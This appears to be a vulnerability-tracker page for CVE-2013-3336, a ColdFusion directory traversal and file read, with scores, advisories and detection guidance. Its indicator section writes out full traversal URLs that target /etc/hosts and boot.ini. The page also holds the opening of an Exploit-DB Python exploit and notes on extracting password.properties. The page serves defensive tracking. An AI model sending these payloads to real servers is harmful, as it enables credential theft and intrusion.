CVE-2013-3336
published 2013-05-09CVE-2013-3336: Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.
PriorityP273medium5CVSS 2.0
AVNACLAuNCPINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
74.27%
99.4th percentile
Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
| adobe | coldfusion | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp↗
url/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../boot.ini&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp↗
url/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp↗
- →Detect directory traversal exploitation attempts targeting l10n.cfm via the 'attributes.file' and 'filename' parameters containing path traversal sequences (../../) combined with 'download.cfm' as the file value and 'thisTag.executionmode=end' in the query string. ↗
- →Alert on HTTP responses setting the 'ANALYZER_DIRECTORY' cookie, which indicates successful path disclosure exploitation of the l10n.cfm endpoint. ↗
- →Flag HTTP requests to /CFIDE/adminapi/customtags/l10n.cfm containing 'thisTag.executionmode=end' and 'thisTag.generatedContent=htp' as indicators of active exploitation. ↗
- →Detect successful credential file exfiltration by monitoring HTTP responses containing the string 'encrypted=true', which indicates password.properties content was returned. ↗
- →Monitor GET requests to /CFIDE/administrator/images/loginbackground.jpg as a fingerprinting step preceding exploitation; MD5 hashes of the response body are used to identify CF version. ↗
- →The Metasploit module targets the same directory traversal to extract password, rdspassword, and encrypted properties from password.properties on ColdFusion 9 and 10. ↗
- ·The exploit is described as a Local File Inclusion (LFI), not a Local File Download — meaning it can include and execute pre-existing .cfm files on the server, not just read arbitrary files. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h3v4-8w95-f7j6: Unspecified vulnerability in Adobe ColdFusion 9
ghsa_unreviewed·2022-05-17
CVE-2013-3336 [MEDIUM] GHSA-h3v4-8w95-f7j6: Unspecified vulnerability in Adobe ColdFusion 9
Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.
VulnCheck
Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 Remote File Read
vulncheck·2013·CVSS 5.0
CVE-2013-3336 [MEDIUM] Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 Remote File Read
Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 Remote File Read
Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.
Affected: Adobe ColdFusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cisa.gov/news-events/alerts/2013/05/09/adobe-releases-security-update-coldfusion; https://cisa.gov/news-events/alerts/2015/04/29/top-30-targeted-high-risk-vulnerabilities; https://www.us-cert.gov/ncas/alerts/TA15-119A
No detection rules found.
Exploit-DB
ColdFusion 9-10 - Credential Disclosure
exploitdb·2013-05-08
CVE-2013-3336 ColdFusion 9-10 - Credential Disclosure
ColdFusion 9-10 - Credential Disclosure
---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
intro="""
_ _ _______ _____ _ _ _______ Cold ,''' Fusion
|_____| | |_____] \ / |______ Cold ,''' /-- Fusion
| | | | \/ ______|. Cold -,__,' Fusion
Name : ColdSub-Zero.pyFusion v2
Description : CF9-10 Remote Root Zeroday
Crew : HTP
"""
cyan = "\x1b[1;36m"
red = "\x1b[1;31m"
clear = "\x1b[0m"
print intro.replace("Cold",cyan).replace("Fusion",clear)
import requests, time, sys, urllib, hashlib
def flash(color,text,times):
sys.stdout.write(text)
line1 = "\x0d\x1b[2K%s%s" % (color,text)
line2 = "\x0d\x1b[2K%s%s" % (clear,text)
for x in range(0,times):
sys.stdout.write(line1)
sys.stdout.flush()
time.sleep(.2)
sys.stdout.write(line2)
sys.stdout.flush()
time.sleep(.2)
print line2
abspath = ""
operatings
Metasploit
ColdFusion 'password.properties' Hash Extraction
metasploit
ColdFusion 'password.properties' Hash Extraction
ColdFusion 'password.properties' Hash Extraction
This module uses a directory traversal vulnerability to extract information such as password, rdspassword, and "encrypted" properties. This module has been tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
Qualys
US-CERT: Top 30 Vulnerabilities | Qualys
blogs_qualys·2015-05-01·CVSS 2.6
[LOW] US-CERT: Top 30 Vulnerabilities | Qualys
On April 29, 2015 US-CERT published TA15-119A which describes the Top 30 vulnerabilities that critical infrastructure organizations should focus on because they are under attack all the time. The list contains Windows, Internet Explorer, Adobe Software from Reader, Flash to Cold Fusion, Java from Oracle and others and is quite similar to the more generic set of software packages published by the German BSI last December.
Here is a list of the vulnerabilities in the advisory. I have reordered and optimized where possible for efficient scanning with Qualys, for example listing the most recent patch first to take advantage of superseding patches:
- Windows: MS14-060 for CVE-2014-4114, Qualys ID: 90979
- Internet Explorer: MS14-021 for CVE-2014-1776, Qualys ID: 100191
- MS14-012 for CVE-201
Qualys
US-CERT: Top 30 Vulnerabilities | Qualys
blogs_qualys·2015-05-01·CVSS 2.6
[LOW] US-CERT: Top 30 Vulnerabilities | Qualys
On April 29, 2015 US-CERT published TA15-119A which describes the Top 30 vulnerabilities that critical infrastructure organizations should focus on because they are under attack all the time. The list contains Windows, Internet Explorer, Adobe Software from Reader, Flash to Cold Fusion, Java from Oracle and others and is quite similar to the more generic set of software packages published by the German BSI last December.
Here is a list of the vulnerabilities in the advisory. I have reordered and optimized where possible for efficient scanning with Qualys, for example listing the most recent patch first to take advantage of superseding patches:
Windows: MS14-060 for CVE-2014-4114, Qualys ID: 90979
MS14-012 for CVE-2014-0322
MS13-038 for CVE-2013-1347
MS13-008 for CVE-2012-4792
MS10-01
http://www.adobe.com/support/security/advisories/apsa13-03.htmlhttp://www.adobe.com/support/security/bulletins/apsb13-13.htmlhttp://www.exploit-db.com/exploits/25305http://www.adobe.com/support/security/advisories/apsa13-03.htmlhttp://www.adobe.com/support/security/bulletins/apsb13-13.htmlhttp://www.exploit-db.com/exploits/25305
2013-05-09
Published
Exploited in the wild